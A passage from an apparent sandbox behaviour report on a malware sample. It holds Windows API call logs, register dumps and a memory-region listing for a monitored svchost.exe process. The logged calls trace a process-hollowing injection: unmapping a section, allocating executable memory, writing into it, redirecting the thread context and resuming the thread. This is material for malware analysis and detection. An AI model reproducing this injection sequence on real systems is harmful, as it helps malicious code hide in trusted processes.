FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x2c7000, Edx=0x0, Ecx=0x0, Eax=0x416797, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0154.029] ReadProcessMemory (in: hProcess=0x110, lpBaseAddress=0x2c7008, lpBuffer=0x19ee28, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19ee28*, lpNumberOfBytesRead=0x0) returned 1 [0154.029] NtUnmapViewOfSection (ProcessHandle=0x110, BaseAddress=0x400000) returned 0x0 [0154.293] VirtualAllocEx (hProcess=0x110, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0154.435] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x400000, Buffer=0x25815a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x25815a0*, NumberOfBytesWritten=0x0) returned 0x0 [0154.496] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x401000, Buffer=0x25817a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x25817a0*, NumberOfBytesWritten=0x0) returned 0x0 [0154.703] WriteProcessMemory (in: hProcess=0x110, lpBaseAddress=0x2c7008, lpBuffer=0x2581654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2581654*, lpNumberOfBytesWritten=0x0) returned 1 [0155.059] SetThreadContext (hThread=0x10c, lpContext=0x25a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x2c7000, Edx=0x0, Ecx=0x0, Eax=0x402dd8, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0161.289] ResumeThread (hThread=0x10c) returned 0x1 [0161.289] CloseHandle (hObject=0x10c) returned 1 [0161.289] CloseHandle (hObject=0x110) returned 1 [0161.289] ExitProcess (uExitCode=0x0) [0161.290] HeapFree (in: hHeap=0x40c0000, dwFlags=0x0, lpMem=0x40c05a8 | out: hHeap=0x40c0000) returned 1 Thread: id = 154 os_tid = 0x1cc Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x510bc000" os_pid = "0x390" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c87e" [0xc000000f], "LOCAL" [0x7] Region: id = 2185 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2186 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2187 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2188 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2189 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2190 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2191 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2192 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2193 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2194 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2195 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2196 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2197 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2198 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2199 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2200 start_va = 0x550000 end_va = 0x556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2201 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2202 start_va = 0x570000 end_va = 0x576fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2203 start_va = 0x580000 end_va = 0x5e3fff monitored = 0 entry_point = 0x595ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2204 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 2205 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2206 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2207 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2208 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2209 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 2210 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 2211 start_va = 0xc20000 end_va = 0xc26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 2212 start_va = 0xc30000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 2213 start_va = 0xcb0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 2214 start_va = 0xcd0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 2215 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 2216 start_va = 0xd00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 2217 start_va = 0xe80000 end_va = 0xe80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 2218 start_va = 0xe90000 end_va = 0xe90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 2219 start_va = 0xf00000 end_va = 0xf00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 2220 start_va = 0xf10000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 2221 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 2222 start_va = 0x1120000 end_va = 0x1126fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 2223 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2224 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 2225 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2226 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 2227 start_va = 0x1500000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2228 start_va = 0x1590000 end_va = 0x168ffff monitored = 1 entry_point = 0x0 region_type = private name = 